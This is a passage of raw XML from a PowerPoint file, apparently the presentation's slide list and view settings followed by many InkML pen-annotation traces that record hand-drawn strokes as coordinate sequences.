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1"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId42"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="305" r:id="rId2"/>
    <p:sldId id="364" r:id="rId3"/>
    <p:sldId id="363" r:id="rId4"/>
    <p:sldId id="390" r:id="rId5"/>
    <p:sldId id="480" r:id="rId6"/>
    <p:sldId id="481" r:id="rId7"/>
    <p:sldId id="456" r:id="rId8"/>
    <p:sldId id="457" r:id="rId9"/>
    <p:sldId id="459" r:id="rId10"/>
    <p:sldId id="479" r:id="rId11"/>
    <p:sldId id="394" r:id="rId12"/>
    <p:sldId id="395" r:id="rId13"/>
    <p:sldId id="396" r:id="rId14"/>
    <p:sldId id="397" r:id="rId15"/>
    <p:sldId id="399" r:id="rId16"/>
    <p:sldId id="466" r:id="rId17"/>
    <p:sldId id="467" r:id="rId18"/>
    <p:sldId id="487" r:id="rId19"/>
    <p:sldId id="469" r:id="rId20"/>
    <p:sldId id="470" r:id="rId21"/>
    <p:sldId id="471" r:id="rId22"/>
    <p:sldId id="472" r:id="rId23"/>
    <p:sldId id="473" r:id="rId24"/>
    <p:sldId id="484" r:id="rId25"/>
    <p:sldId id="462" r:id="rId26"/>
    <p:sldId id="474" r:id="rId27"/>
    <p:sldId id="475" r:id="rId28"/>
    <p:sldId id="461" r:id="rId29"/>
    <p:sldId id="482" r:id="rId30"/>
    <p:sldId id="483" r:id="rId31"/>
    <p:sldId id="400" r:id="rId32"/>
    <p:sldId id="401" r:id="rId33"/>
    <p:sldId id="402" r:id="rId34"/>
    <p:sldId id="403" r:id="rId35"/>
    <p:sldId id="404" r:id="rId36"/>
    <p:sldId id="405" r:id="rId37"/>
    <p:sldId id="406" r:id="rId38"/>
    <p:sldId id="407" r:id="rId39"/>
    <p:sldId id="422"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7" d="100"/>
          <a:sy n="97" d="100"/>
        </p:scale>
        <p:origin x="-752" y="-112"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="162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2/17/14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7:31:39.875"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">15427 4449,'20'-35,"5"1,-25 34,45-25,39 20,50 31,48 34,-17 12,-24-22,11-31,0-27,10-4,23 6,9 7,16 10,33 10,9 6,27-8,17-5,-15-10,-17-9,10-17,-25-1,-9 8,37 26,0 19,-11-14,-3-12,-15-9,-16-12,-14-7,2 0,-5 17,-2-5,8 11,0 7,19 5,3 5,-41-5,-30-4,1 13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13803">2844 6076,'1'-4,"2"-7,-3 11,0 0,0 0,0 0,12-5,-12 5,0 0,0 0,32 6,-32-6,0 0,51 13,-51-13,71 15,37 3,50-22,42-7,34 4,38-17,8 13,32-8,47 2,1 1,-1 6,23 9,-18-7,6-3,20 4,-19-15,-12 2,-11 3,7 6,-25 9,-10 8,-2 3,-1-7,-25-5,-24 2,13 6,-9 6,-6-2,-9-7,-35-5,-10-9,-1 2,-31 3,-27 13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="27903">13633 6091,'22'-14,"-5"0,-17 14,0 0,0 0,25-13,-25 13,0 0,32-7,-32 7,57 0,22 10,28-3,1-5,10-1,21 3,16-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="28451">14988 6063,'214'2,"9"5,10-1,1-1,-1-10,-6 4,21-10,-27-2,-22-5,14-5,-4 5,4 3,3-8,-13 7,-12-5,20 9,2 5,-5 4,18 7,-1 0,8-3,22 13,-13-7,5 4,1-6,-24-11,-5 2,-3 2,-12-2,-41 12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="41098">3936 7485,'31'-5,"19"-5,-50 10,92-3,29-1,35 5,35-4,29-5,13-7,10 3,27-6,-3-8,-17-1,12-6,0 7,7 9,30 1,-1 4,-19-3,12-3,-14 2,9 5,32 13,-9 5,-26-2,7-3,-21-6,7 3,5-3,-36 8,-33 0,-26-3,-48-5,-31-4,-14 9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="45039">2441 9551,'-2'0,"-3"0,5 0,0 0,-18 5,18-5,-46 11,-36-3,-41 10,-40-16,8-2,10 9,4-15,57 12,47-18,36 7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="45640">1948 9212,'14'-16,"-3"7,-11 9,0 0,0 0,8 5,-8-5,0 0,22 24,-22-24,49 41,35 3,12-3,-15-7,-37-4,-28-5,-22-1,-33 20,-44 10,-5-2,35-15,33-10,17 18,-11-14,-43 9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="58928">16486 9993,'131'15,"12"-6,54-5,11-8,23-3,21-8,3 4,17-1,36 1,-5 2,0-3,-10 0,10 4,-4 2,-12-10,-18 4,-14 6,-27 3,-32 22</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8:24.505"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">12776 3679,'-10'-17,"-39"-5,49 22,-76-25,-28 7,-21 3,-11 16,1 17,-8 17,-22 4,-25 2,-16 14,5 20,9 8,11 8,0 12,20 4,16 15,36 6,27 3,14-4,19-5,12-14,5-14,9-7,27-12,16-15,2-14,-9-17,-10-11,-3 13,0-5,12-1,0-1,23-2,-8-13,-6-5,-21-1,-16 21,-6 9,7 4,1-8,16-11,15-2,-13-4,-12 13,-4 3,-5-5,-2-4,7-1,5-8,6-3,-9 11,5 11,-7 3,-7 0,0 4,-11 0,-11 6,-6-3,-24-6,-14-6,-9-5,5 4,-3 6,-11 5,0-1,-5-3,-15 10,-16-4,-16-10,-18-13,-40-23,-11-8,6 0,12 7,-2 3,1 5,7-3,-6 0,2-4,-7 4,15 26,14 11,29 13,19 23,21 8,-1 13,0-8,4 9,17-10,1-4,2 11,-7 9,0-11,17-1,17 7,12 5,16-5,13 31,16 3,-1 21,-12-2,-5 4,2 15,19 2,16 13,-11 4,-26-7,-24 0,-4 3,25-12,10 6,6 1,-3 13,4-12,9 11,6 3,8 2,-6 11,9-11,8-8,2 6,-4-22,-14-17,-8-9,-2-23,9-24,9-11,-2-16,-4-27,0-13,-3-18,4-7,5-6,16-20,22-29,-4-19,11-10,-8 12,-13 21,-12 16,-13 23,-13 12,-10 33,-24 11,-29 8,-16-5,-20-8,-17-22,7-10,-24-14,6-22,-14-32,16-32,24-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1379">10866 6500,'-70'-6,"-5"3,-20-1,-10 3,-19 5,-31 2,-30 1,-3 4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2833">5401 8810,'-104'-14,"-34"15,-18 22,-67 12,-36 5,-37-9,-46-14,27-20,4 0,50-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3624">5520 11319,'-84'-2,"-19"5,-46 6,-14 5,-33-11,-19 3,-49-13,10 10,-35-14,-12-1,-46-4,77 3,38 0,20 22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="29614">10246 6531,'21'78,"9"10,-3-12,-5 3,-26-7,-43-28,-54-26,-26-21,-22 1,-13 13,10 4,-3 6,-10 2,-21 4,-25-3,-13-11,-28-9,-30-3,-9 7,-33-4,19 4,-7-3,-19-25,6 1,43 8,44 5,35 7,35 11,23-2,24 15,33 13,12 16,-2 4,-21-11,2-4,11 1,25-1,11 2,9 5,19 17,16 7,-1 6,-5 8,-15 17,7-4,-1-7,9-10,7 4,6 11,-7-4,-16-3,-4-24,4-9,1-8,25 2,26 13,18 7,1 24,-19 6,-11-1,7 20,0-21,0-13,-11-5,-1-19,-11-2,-17-14,-10 6,-5-18,13 0,15-10,2-3,2-7,-2 9,0 4,-9-2,-2 24</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="29982">4263 11455,'-9'107,"0"18,-7 8,2-3,14-25,21-17,2-17,-7-18,-5-13,-13-25,-1-13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="30353">4399 12205,'39'-31,"-21"-12,-18 43,22-51,2-13,6 17,6 12,-22 27,-9 16,-18 28,-29 7,-35-20,-9-21,-39-43,-21-24,-13-29,38-16,46 3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="88185.4258">17274 3866,'31'-15,"-14"-22,-17 37,4-85,-7-33,12-17,7-1,7 39,-4 51,-7 26,-1 26,21 73,11 63,-4-3,-8-15,-21-29,-5-33,-6-37</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="88408.4927">17572 3667,'19'5,"-21"0,2-5,0 0,0 0,-28 14,28-14,0 0,-69-1,69 1,-114-19,14 5,54 10,36 13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="88947.6544">17955 3183,'-14'90,"10"78,16 9,1-23,4-57,-4-26,3-37</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="89244.7435">18244 3288,'-40'-11,"-49"-6,89 17,-121-5,-2 15,10 1,31-2,29-9,-6-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="89846.9241">18560 4108,'-10'4,"-30"-19,40 15,0 0,-52-53,52 53,-68-79,13-22,25-44,37-6,28-2,17 56,-5 49,-13 37,-9 27,-14 60,-44 32,-26 5,-8 5,13 0,14-10,7-17,24-48,36-10,52-42,34-49,-6-29,-44 47,-39 21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="90508.1224">19049 4080,'7'-15,"-5"-31,-2 46,0 0,-4-54,4 54,-6-75,9-8,1 26,9 8,-10-17,1-34,5-39,-1 5,-15 45,-12 27,-6 21,11 21,14 20,0 0,-2 6,-14 19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="90835.2205">19678 3146,'-30'-8,"-71"-21,-37-3,-30 9,-13 12,-4 18,32 4,13 9,7-10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9:20.869"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1888 2194,'4'0,"2"4,-6-4,0 0,0 0,29 6,-29-6,0 0,85 5,-85-5,158 27,74 7,13 7,2-1,-31-20,-44-31,-20-21,-16-36,1 28,34 20,77 29,32 14,-2 14,-14-37,-9-12,32-24,-41 2,3 9,-13 14,-11 17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="24442.3305">19138 8333,'-48'-15,"-10"3,58 12,-87-11,-22 10,-15 23,8 4,-1-8,-12-4,0-19,-20-14,-30-20,10 10,27 22,15 24,21 1,3-3,-28-12,-16-14,-17-10,-7-2,-2 12,-7 11,8 21,-12 8,-31 1,0-13,-18-12,-10-16,2-5,21 15,27 22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="46491.9434">12803 9629,'24'-5,"-28"-8,4 13,0 0,0 0,0 0,-26-32,26 32,0 0,0 0,-3-36,3 36,0 0,35-28,-35 28,76-9,50 17,39 22,4 17,-27-1,-28-14,-5-20,-8-23,-10-22,-20-16,15-2,35 31,53 29,43 21,-11-2,-10-9,-12-18,1-20,15-16,-44 1,-22 7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="64956.4811">20774 11313,'9'-4,"4"3,-13 1,0 0,0 0,21 7,-21-7,0 0,12 18,-12-18,-3 14,-17 3,20-17,0 0,0 0,0 0,-34 10,34-10,0 0,0 0,-32 4,32-4,0 0,-48 7,48-7,-65 12,6 3,-7 2,-14 1,12-12,-15 3,13-13,-27-6,4-10,-12 5,13 0,2 13,0-10,7 10,5 0,-15 2,5-11,-24 2,4-12,0 8,3-2,6 2,-4 7,4 6,11 11,-2 9,5 1,-20-12,-1-8,-18-5,-6 3,-8 7,3 6,-2 4,-3-1,-15-3,-3-5,-9-1,-2 3,24-2,-7-1,-11-5,-1-1,-3 5,13-4,2 0,4 0,2-2,-8-6,-1 3,-12-7,23 6,4-1,8 6,8-1,24 4,20 1,6-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="81643.4857">16134 12390,'21'-8,"3"-2,-24 10,0 0,38-14,-38 14,44-13,17 3,23 7,20 9,1-5,-5-6,12-4,7 2,7 8,13 7,0 3,4 4,-2 3,2 0,14 4,-6-11,12 5,3-7,4 1,4-9,-9-3,13-12,-7-3,5 5,16 7,-4 4,7 17,2 6,-19 4,-28-13,-30 13</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1:07.208"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">22835 1118,'52'-27,"-4"1,-48 26,62-27,28-1,10 21,14 16,-3 17,-31 32,-3 15,-23 19,-18 10,-23 45,-7 18,2 64,23 27,17 7,-12 22,-12-86,-25-12,-28-67,-46-28,-69-58,-42-58,-4-11,2-32</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1:54.293"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">5398 8130,'3'-1,"-7"3,4-2,0 0,0 0,-20 4,20-4,0 0,-37 1,37-1,-47 8,-12 1,-14-9,-13-5,14-5,11 0,11 5,-12-12,12 8,-2-10,9 9,4 14,1 12,1 1,12-7,5-10,-11-11,-1-4,8 9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1858.5574">6598 5814,'11'-18,"-9"4,-2 14,0 0,0 0,0 0,3-8,-3 8,0 0,0 0,1-1,-1 1,0 0,-11 4,11-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2290.687">6374 5780,'-80'0,"18"7,-4 7,-3-4,1 2,-8-13,-4 4,-9-10,-13 14,15 0,-4 2,2 8,-1 0,-10-9,4 2,4-13,-15 9,3-9,-7 3,-9-4,0 2,-6-1,6-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7987.3955">3930 8044,'1'-4,"-4"4,3 0,0 0,0 0,0 0,0 0,-6 2,6-2,0 0,0 0,0 0,-11 15,11-15,0 0,0 0,-6 36,6-36,0 0,-3 42,3-42,5 54,-7-20,-1-2,-5-19,-12-9,-25-18,-12 7,-24-18,2 20,-11-10,12 16,7-18,20 11,12-2,-3-15,2 13,0 5,-9 0,10 3,22 0,9 2,2 0,0-6,2-12,-3-20,7-1,-5 0,10 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="15799.7385">4731 10360,'0'-17,"-1"6,1 11,0 0,0 0,0 0,0 0,2-7,-2 7,0 0,0 0,0 0,0-2,0 2,0 0,0 0,0 1,0-1,0 0,-3 9,3-9,-1 26,2 8,-1-34,0 0,0 0,4 44,-4-44,0 0,7 50,-7-50,11 48,-9-10,-13-9,-2-10,-2-10,-1-8,-17-9,-10 2,-14-11,-2 11,-18-7,2 15,-2-8,5 5,-8-5,3 4,6-1,-10-3,7 6,2-6,14 8,-12-9,-4 5,-1-2,1-4,4 9,-4-9,0 13,2-13,2-1,1 2,-2 1,1 13,-2-15,6 4,5 8,-7-6,-3 3,13 3,3-20,9 6,2 8,-8-4,3 2,5 9,-15 12,7-1,1-4,11-14,12-6,6 0,-5 8,8 1,2 2,14-3,3-1,-2-4,-2-1,0-5,6-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="57534.2551">8488 12160,'6'1,"-13"-8,7 7,0 0,0 0,-12-11,12 11,0 0,-33-19,33 19,-51-18,-25 6,12 25,-19 14,-4 0,-6-8,-14-18,-14-16,-7-8,-5 2,3 17,7 11,-3 15,-9 1,-6-8,-17-11,-7-8,-29-11,-18-17,-9 17,30 25,36 37,-21 11,9 0,-14-23,-13-25,-14-33,-9-9,-4 1,-24-1,15 17,17 6,42 8,14 1,21 0,8-7,-1-8,15 2,2 11,-4 1,5-12,-3 10,2 2,4-16,1 14,11-3,15 6,-1-3,24 14,20-2,17 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="92914.8661">9231 7848,'13'-18,"-22"19,9-1,0 0,0 0,-33 7,33-7,0 0,-60 3,60-3,-75 4,-19-2,-14-2,-1-2,-13-5,8-5,15-2,-1 3,37 7,17-1,28 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="93265.9714">8335 7609,'33'-10,"5"-1,-38 11,0 0,30 4,-30-4,7 16,-26 19,19-35,0 0,0 0,-44 38,44-38,0 0,-54 35,54-35,-58 38,30-5,33-6,46 3,48 16,7 3,-13 9</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3:47.832"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">5449 7955,'-25'-12,"2"4,23 8,0 0,0 0,-25-7,25 7,0 0,-43-11,43 11,-63-3,-21-5,-14 4,-12-10,5 3,6 0,-1-6,-14 10,5-2,13-1,18 8,43 0,27-1,17-1,28 3,26-3,25 5,15 0,12-5,6-3,-7-1,-18 2,-37-4,-42 7,-18 2,-25-3,-49-4,-34 9,-42-4,0 6,22-3,28-6,48 5,40 4,17 0,32 10,36 0,57 5,47 1,2 0,-5 2,-48 2,-59-6,-48-9,-45-6,-72-9,-67-7,-37-2,-54-15,35 4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11175.3516">10193 7095,'-3'1,"-14"0,17-1,0 0,0 0,-42 11,42-11,0 0,-58 18,58-18,-76 30,7 16,-3 17,-6 22,25 22,13 14,19 32,19 10,7 0,26 0,26-18,23-22,18-13,-9-20,-12-14</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12776.8319">4322 6860,'15'-10,"-13"5,-2 5,0 0,0 0,0 0,0 0,-7-3,7 3,0 0,0 0,0 0,-24 2,24-2,0 0,0 0,-38 5,38-5,0 0,-52 11,52-11,-83 22,-30 2,-17 7,14 14,30 7,23 1,34 0,21 9,26 3,15-8,-8 8,-17-34,-8-4,-6-11,5-15,3-7,11-25,10-6,20-2,-10 8,-6 18,-19 6,-7 7,-2 2,-3 7,-2 1,-2-1,-3-2,-8-4,-10-12,-10-11,-18-4,-21-3,-6-5,17 4,37-8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="18882.6631">9663 6650,'-9'-25,"-4"2,13 23,0 0,0 0,21-28,-21 28,0 0,52-24,-52 24,105-21,38 1,37 2,63-5,10 13,26-7,45 0,17 14,-2 10,23-4,-28-14,-7 2,22-5,-27-6,-25 0,-6 6,-44 3,-42 7,-21 6,-54 13,-36 15,-20 16,-10 18,-13 18,-16 25,-31 12,-22-1,-14-9,4-32,10-27,3-22,7-7,-13-21,-27 0,-22-12,-12 2,-20 3,4 3,-22 11,-39 2,-22 5,-14-2,-30 6,6 0,-9 5,-39 7,-7-11,0 0,-19-3,5-1,2-2,-27-1,22-13,23-7,2 1,33-5,14 1,6 0,44 3,41 2,55-4,49-7,17-3,7-14,4-7,-4-8,0-24,13-20,20-9,10-10,4 6,3 9,-3 4,-24 25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="37842.3493">16771 8164,'32'2,"-12"1,-20-3,0 0,0 0,1-1,-1 1,0 0,-13-5,13 5,-35-3,-24 1,59 2,0 0,-73-2,73 2,-88-3,10 1,11 6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38735.6172">12038 8540,'-39'15,"-26"-4,65-11,-78 5,-19-5,-17-7,-7-4,-2-6,26-4,35 4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="54786.2547">4836 5025,'-18'0,"-13"-6,31 6,0 0,0 0,-36-5,36 5,0 0,-40 0,40 0,-51 5,-7 0,0 8,-14-4,-2-9,-3-2,-9-10,-6 4,-2 4,-4 8,4 2,13 1,-8-1,-5-1,4-1,-12-8,0 0,7 9,-7 3,6-1,-2-7,5 3,3-3,-3-16,-7 19,23-4,25-12,32 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="72892.8753">17330 3211,'22'-15,"-15"-1,-7 16,0 0,0 0,-10-20,10 20,0 0,-21-20,21 20,-37-8,-32 2,-36-2,-46 4,-14 13,-4 13,-14-3,9-8,32-11,-8-12,-6-16,8 1,16 8,16 14,7 9,-16 2,4-5,-4-2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5:21.267"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">7131 8253,'-23'8,"-15"-2,38-6,0 0,-49 2,49-2,-68 2,-16 4,-14-2,-16 1,4 0,-1-8,-10 4,-6-4,3-5,-3-6,19-1,6 3,-14-4,3 2,8-2,23 12,23-7,18 8,3 9,-12-8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="784.1568">2056 8159,'-5'-4,"-6"-4,11 8,0 0,0 0,-18-3,18 3,0 0,-45 6,45-6,-96 13,-25-20,3 21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12935.5866">8683 8316,'-3'-2,"-30"-24,33 26,0 0,-58-41,58 41,-84-37,12 21,9 17,2 20,-2 12,-3-4,-3-20,6-17,1-2,-3-3,27 13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14028.8052">6688 6876,'-9'0,"-9"8,18-8,0 0,0 0,-28 21,28-21,0 0,-29 32,29-32,-37 50,4 13,21 14,12 11,13-8,2-26,3-10,-13-24,-1-12,-4-9,-1-17,7-21,1-10,10 12,11 26,1 28,-26 16,-29 0,-20-9,-14-19,-4-20,-6-20,5-11,20-10</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9:33.422"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#FF0000"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">3566 1154,'1'-16,"-5"5,4 11,0 0,0 0,-3-5,3 5,0 0,0 0,0 0,-5 2,-27 6,32-8,0 0,-51 7,51-7,-60-3,-15 11,5-8,-13 9,-2-5,-23 9,-16-6,-114-7,113 8,8-8,7 2,-22 0,12-10,3-2,-5-1,20 4,8-1,-12 5,5 2,5 2,17-9,34-3,20-2,18 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="9719.9719">20354 7158,'7'-12,"-24"3,17 9,0 0,-45-11,45 11,-79-20,-24 16,-31 15,-51 2,-27-12,-35-7,-65-22,1-7,2-1,-30 20,27 24,25 9,21 0,63-13,57-16,18-13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11115.1114">17044 6843,'-24'-6,"-35"-1,59 7,-94-8,-25-2,-42-10,-9-7,-6-18,-30-23,-28-22,-19-21,-48-28,1-14,-1-15,-18-40,25-20,26-12,-37-45,-27-5,1 6,-11-14,4 17,0 4,-35-31,22 22,0 30,-46 5,-9 33,8 17,0-5,30 8,22 25,-8 27,31 45,48 22,32 3,55 21,43 11,24 13,32 11,37 0,31 4,20-2,16-1,9-2,43-13,28-6,35-18,-35 21,-68 30,-27 7,-21 11,-61 20,-29 9,14-1,12-5,45 0,16 16,61 1,43-1,30 3,15 18</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12188.2187">15107 5348,'17'-28,"-1"4,-16 24,0 0,29-24,-29 24,56-21,23 9,24 22,-10 36,-27 28,-39 16,-43 4,-25-30,-7-20,18-21,23-22,19-15,42-7,31 23,2 20,-15 13,-35-9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12509.2508">15830 5238,'43'-9,"-37"39,-6-30,0 0,-6 62,6-62,-18 77,5-18,21-28,37-25,12-20,-1-12,11-8,-1 13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12750.2749">16193 5150,'-5'23,"3"54,2-77,10 97,4 26,16-22,-6-33,1-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13166.3165">16913 5539,'50'-22,"-3"2,-47 20,47-21,0-20,-32 2,-38 12,-24 14,-5 30,21 23,31 23,33 1,31-3,20-21,-16-30</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13356.3355">17491 5455,'-16'59,"-22"1,38-60,-47 46</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13549.3548">17535 5708,'23'-7,"-26"-1,3 8,0 0,-47-35,47 35,-76-45,2-5,29 10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13788.3787">17548 5159,'34'-4,"-22"44,-12-40,27 91,-13 33,8 8,0-30</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13964.3963">17710 5542,'0'-7,"-33"-3,33 10,0 0,-69-14,69 14,-76-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14221.422">17955 5722,'33'-14,"-32"-30,-1 44,0 0,-13-68,13 68,-1-82,39 10,17 39,21 21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14559.4558">18378 5472,'-51'-19,"-25"20,76-1,-43 36,32 26,47-2,24-22,9-24,-23-37,-21-42,-14-3,6 44,17 38,29 62,-11 17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="24319.4317">1054 2865,'5'-3,"-7"1,2 2,0 0,0 0,-11-6,11 6,0 0,-21-15,21 15,-23-10,-11 11,34-1,-59-5,0 10,14 9,18-5,3-5,8 11,-3 11,6 8,2 33,-3 11,-5 30,28 14,22-4,20 43,-16 19,-11 17,-6-28,2 0,2-27,12-19,-1-36,-8-22,-16-52,-3 1,6-1,43 11,38-10,34 18,56-22,36 33</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="26713.6711">8928 3938,'4'-5,"-4"-1,0 6,0 0,0 0,-6-5,6 5,0 0,-3 1,3-1,6 18,7 13,-13-31,0 0,0 0,0 0,17 38,-17-38,0 0,0 0,3 30,-3-30,0 0,3 21,-3-21,-2 13,-1-8,-1-4,0-4,-6-1,-6-1,-7 3,-5-1,-6 2,-20 8,-10-2,-9 0,-4-3,-1 0,4 6,8-8,10-2,14-8,3 1,6 4,9 1,5-1,14 5,4 0,1 0,0 0,-4 0,-4 3,5-3,3-1,0-1,1-2,1-6,5-22,16-23,-1 9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="27959.7957">5807 3938,'1'-16,"-8"1,7 15,0 0,0 0,-4-3,4 3,0 0,2 15,-2-15,17 44,3 9,-20-53,13 52,-14-10,-11-8,-9-13,-5-14,-13-6,-16-10,-18-3,9 0,-17-4,-4 1,-5-8,3 9,24 1,29 6,24 3,18-7,20-10,0-5,-4 3,-16 1,-7-3,4 0,10 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="43149.3145">14480 8716,'7'33,"-2"31,-5-64,-9 79,0 6,-1-12,-8-13,9-17,7-16,2-15,1-8,-2-1,-1 4,-7 3,-15 4,-21-3,-15-1,-32-4,-19-1,-12-4,-35-3,-12 3,0-1,-24-9,0 1,5 0,-22 1,7 0,4 8,-18-5,7 1,11-5,-12-1,11 3,8 4,-9 2,11 0,39 0,30-1,42 0,42 2,15-1,8 3,8-1,2-2,3-1,-6-9,6-13,0-19,10-13,-3-29,-6-4,-1 14,0 11,7 19,-3 18,13 6,4 12,29 8,28 6,29 7,31-8,35-1,26-2,20-4,37-2,-1 4,0 3,28 5,-15 2,-12 2,8 1,-31-5,-15-2,-3-6,-26-4,-37-9,-21-10,-27 3,-12 13,2 10,5 12,-13 12,-31-3</inkml:trace>
